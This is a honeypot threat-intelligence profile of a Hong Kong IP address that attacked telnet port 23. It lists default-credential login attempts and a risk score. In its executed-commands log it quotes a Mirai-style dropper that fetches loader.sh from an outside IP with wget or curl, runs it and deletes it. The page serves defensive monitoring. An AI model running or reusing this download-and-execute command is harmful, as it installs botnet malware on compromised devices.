Active Threat • LOW
103.75.117.56
Country of Origin🇭🇰 Hong Kong
First Detection4/12/2026
Last Activity4/12/2026
ISPLEASEWEB HONG KONG LIMITED
🎯
11
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
2
Malware
Geolocation
- Country
- 🇭🇰 Hong Kong
- City
- Hong Kong
- ASN
- AS133752
- ISP
- LEASEWEB HONG KONG LIMITED
Attack Types
ssh_telnet_honeypot
Attacked Ports
23
Associated Malware
Attempted Credentials
🔐root/root
1x🔐root/(empty)
1xExecuted Commands
$
cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget http://103.106.229.247/loader.sh -O .x 2>/dev/null || curl -s http://103.106.229.247/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x1x$
echo mirai1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Risk Assessment
25
/100
LowMediumHighCritical